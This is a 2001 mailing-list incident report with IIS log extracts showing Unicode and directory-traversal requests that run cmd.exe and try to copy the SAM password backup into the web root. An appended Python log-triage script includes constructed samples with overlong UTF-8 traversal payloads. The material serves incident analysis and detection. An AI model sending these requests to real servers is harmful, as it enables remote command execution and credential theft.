Security Incidents mailing list archives

IIS Unicode attack decode


From: ROBERT DEMAIN <rdemain () RM COM>
Date: Tue, 20 Mar 2001 14:56:22 -0000

Hello All,

Recently I've been seeing quite a few attempts from the same Russian IP
trying to send Unicode commands to a web server.  These attacks were picked
up by an IDS.  Below are extracts from the log file on the web server.

My understanding of what has happened here is as follows:
- attacker tries a few attempts at doing a dir listing of c: and d:
- attacker tries to copy important stuff from the \repair directory to
c:\inetpub\wwwroot (most unfriendly)
- attacker tries to copy a bitmap (Blue%20Lace%2016.bmp) - not sure what this
is about

Putting it all together it seems the attacker tried to use the IIS 4 and 5
Unicode exploit to copy the SAM file to a place where he/she/it thought they
could get it from (on this server c:\inetpub\wwwroot is not the default web
site or anything, but I believe it is on a default IIS install).  This
failed for two main reasons: 1. the IUSR_servername account (which is the
user account this exploit can run as - correct me if I'm wrong) does not
have permissions on \repair; 2. the copy of the file to c:\inetpub\wwwroot
would also fail as IUSR_servername would not have the rights.

Anyone have any comments on this?  Anyone else seen activity like this?

Regards

Rob


2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm -
200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404
Mozilla/3.0+(compatible)
2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\
200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+c:\Inetpub\AdminScripts\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe
/c+dir+c:\Inetpub\wwwroot\ 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)


Standard Disclaimer: This message is confidential.  You should not copy it
or disclose its contents to anyone.  You may use and apply the information
only for the intended purpose.  Internet communications are not secure and
therefore RM does not accept legal responsibility for the contents of this
message.  Any views or opinions presented are only those of the author and
not those of RM.  If this email has come to you in error please delete it
and any attachments.  Please note that RM may intercept incoming and
outgoing e-mail communications.
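The following is an added example for this archive page, not code from the original message: a small triage script that decodes IIS W3C extended log lines of the kind quoted above and tags the cmd.exe traversal requests. It assumes the field order seen in the extracts (date, time, c-ip, cs-username, s-ip, s-port, cs-method, cs-uri-stem, cs-uri-query, sc-status, cs(User-Agent)); the sample lines, server IPs and tag names are constructed for the example. Two of the constructed lines carry the overlong UTF-8 escapes (%c0%af for "/", %c1%9c for "\") that the Unicode bug (MS00-078) was actually exploited with, since an IDS sees those raw while IIS usually logs the already-decoded path, as in the extracts. One caveat worth building into the triage: IIS returns 502 when a CGI program's output does not begin with HTTP headers (or a blank line), and `dir` happens to start its output with a blank line while `copy` does not, so the 502 rows show that cmd.exe ran and printed something non-header-shaped, not that the copy failed. (Blue Lace 16.bmp is a stock wallpaper shipped in the Windows directory, which makes the two 502 copies of it look like a test of whether copying into the web root works at all.)

```python
"""Decode and triage IIS W3C extended log lines for the cmd.exe traversal
pattern discussed in the post. Added example, not part of the original
message. Assumed field order (matches the post's extracts): date time c-ip
cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
cs(User-Agent)."""
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample modelled on the post's extracts (not copied verbatim;
# server IPs are made up). Lines 3 and 6 carry the overlong UTF-8 forms
# (%c0%af, %c1%9c) of the IIS Unicode bug; IIS usually logs these decoded.
SAMPLE_LOG = r"""
2001-03-19 22:22:56 195.239.1.206 - 10.0.0.5 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - 10.0.0.5 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - 10.0.0.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:24:48 195.239.1.206 - 10.0.0.5 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible)
2001-03-19 22:25:10 195.239.1.206 - 10.0.0.5 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible)
2001-03-19 22:28:10 195.239.1.206 - 10.0.0.5 80 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible)
2001-03-19 22:30:00 10.1.1.9 - 10.0.0.5 80 GET /scripts/report.exe /c+dir 200 Mozilla/4.0+(compatible)
"""

OVERLONG = re.compile(r"%c[01]%([89ab][0-9a-f])", re.I)  # 2-byte overlong UTF-8
FIELDS = ("date", "time", "c_ip", "user", "s_ip", "port", "method",
          "stem", "query", "status", "agent")
SHELLS = {"cmd.exe"}


def decode_overlong(s):
    """Map overlong 2-byte UTF-8 escapes to the ASCII they encode:
    %c0%af -> '/', %c1%9c -> '\\'. Code point = (lead & 0x1F) << 6 | (cont & 0x3F)."""
    def repl(m):
        lead = int(m.group(0)[1:3], 16)
        cont = int(m.group(1), 16)
        return chr(((lead & 0x1F) << 6) | (cont & 0x3F))
    return OVERLONG.sub(repl, s)


def normalise(stem):
    """Split on '/' or '\\' and resolve '.' and '..'. Unresolvable '..'
    components stay at the front so the caller can count the climb."""
    parts = []
    for p in stem.replace("\\", "/").split("/"):
        if p in ("", "."):
            continue
        if p == ".." and parts and parts[-1] != "..":
            parts.pop()
        else:
            parts.append(p)
    return parts


def parse_line(line):
    cols = line.split(maxsplit=10)
    if len(cols) != len(FIELDS) or not cols[0][:4].isdigit():
        return None
    return dict(zip(FIELDS, cols))


def triage_line(line):
    """Return a verdict dict for a traversal or shell request, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    stem = unquote(decode_overlong(rec["stem"]))
    query = "" if rec["query"] == "-" else unquote_plus(decode_overlong(rec["query"]))
    parts = normalise(stem)
    climbs = 0
    while climbs < len(parts) and parts[climbs] == "..":
        climbs += 1
    exe = parts[-1].lower() if parts else ""
    tags = []
    if OVERLONG.search(rec["stem"] + rec["query"]):
        tags.append("overlong-utf8")
    if climbs:
        tags.append("traversal")
    if exe in SHELLS:
        tags.append("shell")
    if "traversal" not in tags and "shell" not in tags:
        return None
    m = re.match(r"/[ck]\s+(.*)", query, re.I)  # strip cmd.exe's /c or /k switch
    command = m.group(1).strip() if m else query
    verb = command.split()[0].lower() if command else ""
    if verb == "dir":
        tags.append("recon")
    elif verb == "copy":
        tags.append("file-copy")
        if "wwwroot" in command.lower():
            tags.append("copy-into-webroot")
    if re.search(r"repair[\\/]sam", command, re.I):
        tags.append("sam-backup")
    # 200: output passed IIS's CGI header check (dir starts with a blank line).
    # 502: output was not header-shaped -- cmd.exe ran, outcome unknown.
    if rec["status"] == "200":
        tags.append("output-returned")
    elif rec["status"] == "502":
        tags.append("non-cgi-output")
    return {"time": rec["time"], "src": rec["c_ip"], "stem": stem, "climbs": climbs,
            "command": command, "status": int(rec["status"]), "tags": tags}


def triage(log):
    return [v for v in (triage_line(l) for l in log.splitlines() if l.strip()) if v]


if __name__ == "__main__":
    for v in triage(SAMPLE_LOG):
        print(f"{v['time']} {v['src']} {v['status']} climbs={v['climbs']} "
              f"{v['command']!r} {' '.join(v['tags'])}")
```

Run against the constructed sample it keeps five of the seven lines: the HEAD and the in-house /scripts/report.exe request are dropped because they neither climb out of their directory nor reach a shell, while the copy of \repair\sam._ comes out tagged traversal, shell, file-copy, copy-into-webroot, sam-backup and non-cgi-output, which is the row to escalate regardless of its 502.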

